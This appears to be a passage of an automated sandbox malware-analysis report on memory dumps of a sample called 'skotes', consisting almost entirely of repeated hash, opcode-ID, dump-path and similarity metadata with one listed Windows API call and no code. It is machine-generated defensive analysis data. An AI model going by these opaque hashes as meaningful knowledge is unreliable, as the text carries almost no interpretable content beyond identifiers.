                                                                                                                                        • Instruction ID: f8c0e6d7a8736e5b51a73eb83cf6a2633dde4dd0f7d5c41ac5cfd943a8563ad3
                                                                                                                                        • Opcode Fuzzy Hash: 8b8c08f207380376272a3c3081265e42339378886e17da3037a34d8edfa76596
                                                                                                                                        • Instruction Fuzzy Hash: 27C25B71E046688FCF25EE29DD447EAB3B5EB48304F1941EAD94DE7240E774AE818F60
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2955176966.0000000000DA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2955106938.0000000000DA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955176966.0000000000E02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955369598.0000000000E09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.0000000000E0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.0000000000F91000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.000000000106F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.000000000109D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.00000000010A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.00000000010B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2959206171.00000000010B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2959554699.000000000124E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2959617390.0000000001250000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_da0000_skotes.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 4febeba0e6df1972b290d54c079ebb9eef800fd61dd105ca4b93d43a1305ea1a
                                                                                                                                        • Instruction ID: 45d48be7ecf3c7dc425f88876273327894fa775ac3e02dc2f556dfead454dac9
                                                                                                                                        • Opcode Fuzzy Hash: 4febeba0e6df1972b290d54c079ebb9eef800fd61dd105ca4b93d43a1305ea1a
                                                                                                                                        • Instruction Fuzzy Hash: A8F13D71E002599BDF14DFA9C8846ADB7F5FF48314F29826DE919AB344D731AE01CBA0
                                                                                                                                        APIs
                                                                                                                                        • GetSystemTimePreciseAsFileTime.KERNEL32(?,00DBCF52,?,?,?,?,00DBCF87,?,?,?,?,?,?,00DBC4FD,?,00000001), ref: 00DBCC03
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2955176966.0000000000DA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2955106938.0000000000DA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955176966.0000000000E02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955369598.0000000000E09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.0000000000E0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.0000000000F91000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.000000000106F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.000000000109D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.00000000010A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.00000000010B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2959206171.00000000010B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2959554699.000000000124E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2959617390.0000000001250000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_da0000_skotes.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Time$FilePreciseSystem
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1802150274-0
                                                                                                                                        • Opcode ID: 5384d9d80c4032979fbbcc229b510f356ecb3ae88a850a3d9cab2dc9fe6265cd
                                                                                                                                        • Instruction ID: cb78b4b2dead1fbf166cc35b2f135133cf95d9b4a0b10e26739ca07d26facd91
                                                                                                                                        • Opcode Fuzzy Hash: 5384d9d80c4032979fbbcc229b510f356ecb3ae88a850a3d9cab2dc9fe6265cd
                                                                                                                                        • Instruction Fuzzy Hash: 96D02232512238DB8A012B84EC008EDBF68AB00B64308A016E90AA3220CA11AC809BF5
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2955176966.0000000000DA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2955106938.0000000000DA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955176966.0000000000E02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955369598.0000000000E09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.0000000000E0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.0000000000F91000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.000000000106F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.000000000109D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.00000000010A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.00000000010B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2959206171.00000000010B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2959554699.000000000124E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2959617390.0000000001250000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_da0000_skotes.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: 0
                                                                                                                                        • API String ID: 0-4108050209
                                                                                                                                        • Opcode ID: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
                                                                                                                                        • Instruction ID: b37212d99a21396a635b2197f243b1b12f7398cd69939a190e5113c5ae2e4e65
                                                                                                                                        • Opcode Fuzzy Hash: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
                                                                                                                                        • Instruction Fuzzy Hash: 33519C706487445ADB3A9B7888967BE779AAF01300F1C059FE482D73C1EE52DD4DA371
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2962793072.0000000004E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_4e50000_skotes.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: =Yra
                                                                                                                                        • API String ID: 0-1741988069
                                                                                                                                        • Opcode ID: 82f3192d7d0acbce7d1b758c8a7daa41198bca5755bb65b548699867fee4fa2f
                                                                                                                                        • Instruction ID: baee1736c54326f83ea2531812905dfdc178046afee04f4f7262c65f936d01e1
                                                                                                                                        • Opcode Fuzzy Hash: 82f3192d7d0acbce7d1b758c8a7daa41198bca5755bb65b548699867fee4fa2f
                                                                                                                                        • Instruction Fuzzy Hash: C4118EEB34C120ADA415945A2B659FA5B2EE3D2330332F52BFC47C5927F6442A8A6031
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2955176966.0000000000DA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2955106938.0000000000DA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955176966.0000000000E02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955369598.0000000000E09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.0000000000E0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.0000000000F91000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.000000000106F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.000000000109D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.00000000010A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.00000000010B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2959206171.00000000010B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2959554699.000000000124E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2959617390.0000000001250000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_da0000_skotes.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 6a5aa1719db5ba89efd1e000a1e1599074adbdb0158bc1a84bdbd83bc5c9c95a
                                                                                                                                        • Instruction ID: a0722dd991af2e5e138881f4fba76f9fca75234c13d2e2b6bde16e5211c9a0f9
                                                                                                                                        • Opcode Fuzzy Hash: 6a5aa1719db5ba89efd1e000a1e1599074adbdb0158bc1a84bdbd83bc5c9c95a
                                                                                                                                        • Instruction Fuzzy Hash: 412260B3F515144BDB0CCB9DDCA27ECB2E3AFD8218B0E903DA40AE3345EA79D9158644
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2955176966.0000000000DA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2955106938.0000000000DA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955176966.0000000000E02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955369598.0000000000E09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.0000000000E0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.0000000000F91000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.000000000106F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.000000000109D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.00000000010A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.00000000010B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2959206171.00000000010B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2959554699.000000000124E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2959617390.0000000001250000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_da0000_skotes.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: a0c33413aa39fd7afa71b6a6b78e21143aea5aabd20b33ac711b71c482aff1fa
                                                                                                                                        • Instruction ID: 41e0665b8f5ed7899c39b349e2e5452f1f9dbe3998aaa217c96f665dce178ab2
                                                                                                                                        • Opcode Fuzzy Hash: a0c33413aa39fd7afa71b6a6b78e21143aea5aabd20b33ac711b71c482aff1fa
                                                                                                                                        • Instruction Fuzzy Hash: 07B18C31614644CFDB68DF29C486B647BE0FF45364F298658E9DACF2A1C335E982CB50
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2955176966.0000000000DA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2955106938.0000000000DA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955176966.0000000000E02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955369598.0000000000E09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.0000000000E0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.0000000000F91000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.000000000106F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.000000000109D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.00000000010A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.00000000010B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2959206171.00000000010B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2959554699.000000000124E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2959617390.0000000001250000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_da0000_skotes.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 089d54493da4c8c8e2df012ac3e68f49636e4ee32fad4b60a58e9eafe540630a
                                                                                                                                        • Instruction ID: d533d3caa64effff04bfb1bdc5d1be36594f2eb11c2a60ddc0899b5873796e4d
                                                                                                                                        • Opcode Fuzzy Hash: 089d54493da4c8c8e2df012ac3e68f49636e4ee32fad4b60a58e9eafe540630a
                                                                                                                                        • Instruction Fuzzy Hash: 81812070A002458FEB15CF69D8947EEBBF1FB9A300F180669D854A7392C7B5D949CBB0
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2955176966.0000000000DA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2955106938.0000000000DA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955176966.0000000000E02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955369598.0000000000E09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.0000000000E0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.0000000000F91000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.000000000106F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.000000000109D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.00000000010A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.00000000010B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2959206171.00000000010B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2959554699.000000000124E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2959617390.0000000001250000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_da0000_skotes.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 71efab29542525783ead0bb2db3ba489eb082cd946440d574077a578b251947a
                                                                                                                                        • Instruction ID: 81d6c31f953be8117b44145b6d57060ec42ac40f298082add8d1d379f80e3597
                                                                                                                                        • Opcode Fuzzy Hash: 71efab29542525783ead0bb2db3ba489eb082cd946440d574077a578b251947a
                                                                                                                                        • Instruction Fuzzy Hash: 3521B673F204394B770CC47E8C5227DB6E1C78C541745423AE8A6EA2C1D968D917E2E4
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2955176966.0000000000DA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2955106938.0000000000DA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955176966.0000000000E02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955369598.0000000000E09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.0000000000E0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.0000000000F91000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.000000000106F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.000000000109D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.00000000010A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.00000000010B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2959206171.00000000010B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2959554699.000000000124E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2959617390.0000000001250000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_da0000_skotes.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 2f6ebdd3f5a2f4f41f907359a04de20eb6d7498abb208cbedb155abe7a08e9e0
                                                                                                                                        • Instruction ID: 52fde3f2b270a15f94d29f346ba434fdcc39e3739c4912a57e9eb2cc12366919
                                                                                                                                        • Opcode Fuzzy Hash: 2f6ebdd3f5a2f4f41f907359a04de20eb6d7498abb208cbedb155abe7a08e9e0
                                                                                                                                        • Instruction Fuzzy Hash: EF118623F30C255B775C816D8C172BAA5D6EBD825071F533AD826E7284E9A4DE23D2A0
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2955176966.0000000000DA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2955106938.0000000000DA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955176966.0000000000E02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955369598.0000000000E09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.0000000000E0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.0000000000F91000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.000000000106F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.000000000109D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.00000000010A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.00000000010B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2959206171.00000000010B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2959554699.000000000124E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2959617390.0000000001250000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_da0000_skotes.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                        • Instruction ID: f4e71ef6934ac4d40a5bf58abae4330458176fcaae736f53a7f8f2136ba4fd03
                                                                                                                                        • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                        • Instruction Fuzzy Hash: A4115B7B6001C243E608A62FF8F45B7A795EBC53257AC437AC8898B748DA22D841B630
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2955176966.0000000000DA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2955106938.0000000000DA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955176966.0000000000E02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955369598.0000000000E09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.0000000000E0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.0000000000F91000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.000000000106F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.000000000109D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.00000000010A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.00000000010B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2959206171.00000000010B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2959554699.000000000124E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2959617390.0000000001250000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_da0000_skotes.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: b60cd36bea1a2b422d56700cc6bddd4018f84b3363974942216b020664aeea14
                                                                                                                                        • Instruction ID: ec873059f6bc8e1c0a4ef34844ef8ca0d24ffa1c63b77b5891e163b7b31a4e9f
                                                                                                                                        • Opcode Fuzzy Hash: b60cd36bea1a2b422d56700cc6bddd4018f84b3363974942216b020664aeea14
                                                                                                                                        • Instruction Fuzzy Hash: 48E08C30081108AECF25BF58E809E483B6AEF51745F049812F9144A325CB26EEC2C6A0
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2955176966.0000000000DA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2955106938.0000000000DA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955176966.0000000000E02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955369598.0000000000E09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.0000000000E0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.0000000000F91000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.000000000106F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.000000000109D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.00000000010A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.00000000010B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2959206171.00000000010B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2959554699.000000000124E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2959617390.0000000001250000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_da0000_skotes.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
                                                                                                                                        • Instruction ID: fba1d09fa14669d17e2d757df84bad401be093057257cc954fbad7b2e38c8d22
                                                                                                                                        • Opcode Fuzzy Hash: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
                                                                                                                                        • Instruction Fuzzy Hash: B6E08C32921228EBCB14DBDCC904D9AF7ECEB49B10B654097F501D3250C270DE00C7E0
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2955176966.0000000000DA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2955106938.0000000000DA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955176966.0000000000E02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955369598.0000000000E09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.0000000000E0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.0000000000F91000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.000000000106F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.000000000109D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.00000000010A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.00000000010B3000.00000040.00000001.01000000.00000007.sdmpDownload File
